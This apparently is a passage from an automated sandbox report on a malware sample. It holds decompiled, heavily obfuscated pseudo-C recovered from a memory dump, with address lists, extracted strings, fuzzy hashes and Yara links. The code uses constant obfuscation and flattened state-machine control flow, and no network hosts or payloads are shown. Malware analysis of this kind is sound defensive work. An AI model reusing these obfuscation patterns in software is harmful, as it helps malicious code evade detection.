				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x24ca20; // 0x0
							_t260 = E00241B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0023F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00242674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00238736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x24ca20; // 0x0
						E002355D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x24ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0024838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00235F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}

0x00249b49
0x00249b53
0x00249b54
0x00249b5b
0x00249b5d
0x00249b5e
0x00249b5f
0x00249b64
0x00249b6c
0x00249b6f
0x00249b7b
0x00249b7d
0x00249b84
0x00249b87
0x00249b8b
0x00249b93
0x00249b9b
0x00249ba3
0x00249ba8
0x00249bb0
0x00249bb8
0x00249bc5
0x00249bc9
0x00249bd1
0x00249bd9
0x00249be1
0x00249be9
0x00249bf1
0x00249bf9
0x00249c01
0x00249c09
0x00249c11
0x00249c19
0x00249c21
0x00249c29
0x00249c2e
0x00249c36
0x00249c3e
0x00249c46
0x00249c4e
0x00249c56
0x00249c5e
0x00249c63
0x00249c6b
0x00249c73
0x00249c7b
0x00249c83
0x00249c87
0x00249c8f
0x00249c97
0x00249c9f
0x00249ca7
0x00249caf
0x00249cb7
0x00249cbc
0x00249cc4
0x00249cd4
0x00249cd8
0x00249ce0
0x00249ce8
0x00249cf0
0x00249cf5
0x00249cfd
0x00249d09
0x00249d0c
0x00249d10
0x00249d18
0x00249d20
0x00249d26
0x00249d2b
0x00249d33
0x00249d3b
0x00249d43
0x00249d4b
0x00249d5a
0x00249d5d
0x00249d61
0x00249d69
0x00249d71
0x00249d76
0x00249d7e
0x00249d86
0x00249d93
0x00249d97
0x00249d9f
0x00249da7
0x00249daf
0x00249db7
0x00249dbf
0x00249dc7
0x00249dcc
0x00249dd4
0x00249de4
0x00249de8
0x00249df0
0x00249df8
0x00249e04
0x00249e09
0x00249e0f
0x00249e14
0x00249e1c
0x00249e24
0x00249e2c
0x00249e31
0x00249e39
0x00249e3e
0x00249e46
0x00249e4e
0x00249e56
0x00249e5e
0x00249e66
0x00249e72
0x00249e75
0x00249e7c
0x00249e85
0x00249e89
0x00249e91
0x00249e91
0x00249e95
0x00249e95
0x00249e95
0x00249e9b
0x00000000
0x00000000
0x0024a010
0x0024a04c
0x0024a064
0x0024a069
0x0024a06e
0x0024a07a
0x0024a07f
0x0024a085
0x0024a0a5
0x0024a0ae
0x0024a0ae
0x00249e91
0x00249e91
0x00000000
0x00249e91
0x00249e91
0x0024a070
0x00249e91
0x00249e91
0x00000000
0x00249e91
0x00249e91
0x0024a018
0x0024a038
0x00000000
0x00000000
0x0024a03a
0x00000000
0x0024a03a
0x0024a020
0x0024a08e
0x0024a09e
0x0024a0a4
0x00000000
0x0024a08e
0x0024a028
0x00000000
0x00000000
0x0024a02a
0x0024a02a
0x00249ea1
0x00249ff8
0x00249ffd
0x0024a000
0x00249e91
0x00249e91
0x00000000
0x00249e91
0x00249e91
0x00249ead
0x00249f9c
0x00249fab
0x00249fac
0x00249fb0
0x00249fb5
0x00249fbb
0x00000000
0x00000000
0x00249fc1
0x00249fc3
0x00249fcb
0x00249fd2
0x00249fd5
0x00249fd9
0x00000000
0x00249fd9
0x00249eb9
0x00249f8c
0x00000000
0x00249f8c
0x00249ec5
0x00249f42
0x00249f6f
0x00249f74
0x00249f79
0x00249f81
0x00249e91
0x00249e91
0x00000000
0x00249e91
0x00249e91
0x00249ecd
0x00249efb
0x00249f00
0x00249f01
0x00249f24
0x00249f2b
0x00249f31
0x00249f34
0x00249e91
0x00249e91
0x00000000
0x00249e91
0x00249e91
0x00249ed5
0x00000000
0x00000000
0x00249eeb
0x00249eec
0x00249eed
0x00249ef4
0x00249ef4

Strings

$R, xrefs: 00249E31
v+, xrefs: 00249DBF
K., xrefs: 00249BD1
0], xrefs: 00249D10
!t, xrefs: 00249D33
', xrefs: 00249DD4
/,, xrefs: 00249C63
b=, xrefs: 00249C97

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /,$!t$$R$'$0]$K.$b=$v+
API String ID: 0-2997250437
Opcode ID: 8a4d8e04c5f95b4cdddbc1bf3411985853f470943adbca11cc3de9f0b761c2e9
Instruction ID: b770be84f8ab8d780115132cb48938af94692ef6a282f138e8c9790206cca724
Opcode Fuzzy Hash: 8a4d8e04c5f95b4cdddbc1bf3411985853f470943adbca11cc3de9f0b761c2e9
Instruction Fuzzy Hash: D3D144711187418FE768CF65C48991FBBE1FB84708F208A1DF596862A0D7BAC959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002412E2, Relevance: 10.2, Strings: 8, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002412E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0023B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002328CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00235AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0024A889(_v1068, _v1064,  &_v1040);
							E00232BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00237B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x24ca2c; // 0x5d8300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0024889D(0x24c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x24ca2c; // 0x5d8300
						_t197 = _t293 + 0x230; // 0x7a0056
						E0023C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x24ca2c, _t257,  &_v520);
						_t256 = E00242025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002463C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}

0x002412e2
0x002412e8
0x002412ef
0x002412f4
0x002412f9
0x00241301
0x00241309
0x00241311
0x00241319
0x00241321
0x00241332
0x0024133c
0x00241341
0x00241347
0x0024134f
0x00241357
0x0024135f
0x00241367
0x0024136f
0x00241377
0x0024137f
0x0024138b
0x00241390
0x00241396
0x0024139e
0x002413a6
0x002413ab
0x002413b3
0x002413bb
0x002413c0
0x002413c5
0x002413c6
0x002413ca
0x002413d2
0x002413da
0x002413e2
0x002413e7
0x002413ef
0x002413fc
0x00241400
0x00241405
0x0024140d
0x00241415
0x0024141a
0x00241422
0x0024142a
0x00241432
0x0024143a
0x00241442
0x0024144a
0x00241457
0x0024145b
0x00241463
0x00241471
0x00241475
0x0024147d
0x00241485
0x0024148a
0x00241492
0x0024149a
0x002414a2
0x002414aa
0x002414b2
0x002414c3
0x002414d0
0x002414d9
0x002414e1
0x002414e9
0x002414f9
0x002414fd
0x00241505
0x00241509
0x0024150e
0x00241514
0x0024151c
0x00241524
0x0024152d
0x00241532
0x00241538
0x00241540
0x00241548
0x00241550
0x0024155d
0x0024155e
0x00241562
0x0024156a
0x00241572
0x00241580
0x00241584
0x0024158c
0x00241594
0x0024159c
0x002415a0
0x002415a5
0x002415ad
0x002415b5
0x002415bd
0x002415c5
0x002415cd
0x002415d5
0x002415dd
0x002415e5
0x002415ed
0x002415f5
0x002415fd
0x002415fd
0x00241607
0x00241713
0x00241718
0x00000000
0x00241718
0x00241613
0x00241747
0x00241750
0x00241752
0x00000000
0x00241767
0x0024161f
0x002416b9
0x002416bf
0x002416e0
0x002416f0
0x002416f4
0x002416fc
0x002416fd
0x00241702
0x00241705
0x00000000
0x00241705
0x0024162b
0x0024169b
0x002416a2
0x002416a9
0x00000000
0x002416a9
0x0024162d
0x0024162f
0x00000000
0x00000000
0x00241635
0x00241642
0x00241647
0x00241659
0x00241666
0x00241670
0x00241676
0x00241689
0x0024168e
0x00241691
0x00241691
0x00241723
0x00241728
0x0024172a
0x0024172a
0x0024172a
0x00000000

Strings

k, xrefs: 00241309
n2, xrefs: 00241475
m , xrefs: 002413C0, 0024170F, 002416F0, 00241659
ld8, xrefs: 00241505
IP, xrefs: 002413CA
+, xrefs: 00241492
B, xrefs: 00241405
j_, xrefs: 0024139E

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: m $+$IP$j_$k$ld8$n2$B
API String ID: 0-4100556268
Opcode ID: 729efa26b5ac55629d6efff75f2dcc902c88292101d5334939ac5f9554871653
Instruction ID: f8848a3a498781ad9b59e7d261633128442ec20ca07ce664e7f08bb3bf3bca88
Opcode Fuzzy Hash: 729efa26b5ac55629d6efff75f2dcc902c88292101d5334939ac5f9554871653
Instruction Fuzzy Hash: 21B13F71118381DFD368CF26C58991BBBF1BBC4758F508A1EF1969A2A0C7B48A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0023B75F, Relevance: 10.2, Strings: 8, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0023B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0023E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0024889D(0x24c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00243EB3(_v52, _t241, _t218, _v76, _v56, 0x24c9d0, _v80, _v28, 0x24c9d0, _v84, 0x24c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00242025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002365A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x24ca2c; // 0x5d8300
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x0023b75f
0x0023b762
0x0023b76c
0x0023b776
0x0023b77e
0x0023b786
0x0023b78e
0x0023b793
0x0023b798
0x0023b7a0
0x0023b7a7
0x0023b7ae
0x0023b7b2
0x0023b7be
0x0023b7c2
0x0023b7c7
0x0023b7cf
0x0023b7d7
0x0023b7df
0x0023b7e7
0x0023b7f6
0x0023b7f9
0x0023b805
0x0023b809
0x0023b811
0x0023b819
0x0023b826
0x0023b829
0x0023b82d
0x0023b835
0x0023b83d
0x0023b84d
0x0023b851
0x0023b859
0x0023b865
0x0023b86a
0x0023b870
0x0023b875
0x0023b87d
0x0023b885
0x0023b891
0x0023b896
0x0023b89c
0x0023b8a4
0x0023b8b1
0x0023b8b2
0x0023b8b6
0x0023b8be
0x0023b8c6
0x0023b8ce
0x0023b8dc
0x0023b8e0
0x0023b8e5
0x0023b8ed
0x0023b903
0x0023b906
0x0023b90a
0x0023b90e
0x0023b916
0x0023b926
0x0023b92a
0x0023b92f
0x0023b937
0x0023b93f
0x0023b94b
0x0023b950
0x0023b956
0x0023b95e
0x0023b966
0x0023b96b
0x0023b970
0x0023b978
0x0023b980
0x0023b989
0x0023b98c
0x0023b990
0x0023b998
0x0023b9a0
0x0023b9a8
0x0023b9ad
0x0023b9b2
0x0023b9ba
0x0023b9c2
0x0023b9ca
0x0023b9d2
0x0023b9da
0x0023b9e2
0x0023b9ea
0x0023b9f2
0x0023b9f7
0x0023b9ff
0x0023ba07
0x0023ba07
0x0023ba09
0x0023ba0a
0x0023ba0f
0x0023ba0f
0x0023ba19
0x0023bae9
0x0023baf0
0x0023baf3
0x0023baf5
0x0023bafd
0x00000000
0x0023ba1f
0x0023ba25
0x0023ba67
0x0023ba74
0x0023ba79
0x0023baaf
0x0023bac8
0x0023bacb
0x0023bad0
0x0023bad5
0x0023bb24
0x0023bb24
0x00000000
0x0023ba27
0x0023ba2d
0x0023ba63
0x00000000
0x0023ba2f
0x0023ba35
0x00000000
0x0023ba3b
0x0023ba4f
0x0023ba54
0x0023ba35
0x0023ba2d
0x0023ba25
0x0023ba57
0x0023ba62
0x0023ba62
0x0023bb06
0x0023bb0c
0x0023bb17
0x0023bb17
0x0023bb1a
0x00000000
0x00000000
0x0023bb14
0x0023bb14
0x0023bb14
0x0023bb1c
0x0023bb1c
0x0023bb1f
0x00000000
0x0023bb29
0x0023bb29
0x0023bb29
0x00000000
0x0023bb35

Strings

(%, xrefs: 0023B835
xq, xrefs: 0023B978
AP, xrefs: 0023B7CF
O1d#, xrefs: 0023BA1F
O1d#, xrefs: 0023BB1F
Cw, xrefs: 0023B9D2
R\, xrefs: 0023B990
,^, xrefs: 0023B8E5

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
API String ID: 0-1090126677
Opcode ID: fc0b7eac682070b86e863ada7dc9972440f97ea631edd66f9fc98ebeca198662
Instruction ID: 65ab8ff57d547d57f0defd82d6deff18c2fc809d54de5397f532130be0a90471
Opcode Fuzzy Hash: fc0b7eac682070b86e863ada7dc9972440f97ea631edd66f9fc98ebeca198662
Instruction Fuzzy Hash: 7AA133B15093409BD359CF64C98A81BFBE2BBC4B58F10491DF285862A0D7B9C959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0023EA4C, Relevance: 10.2, Strings: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0023EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
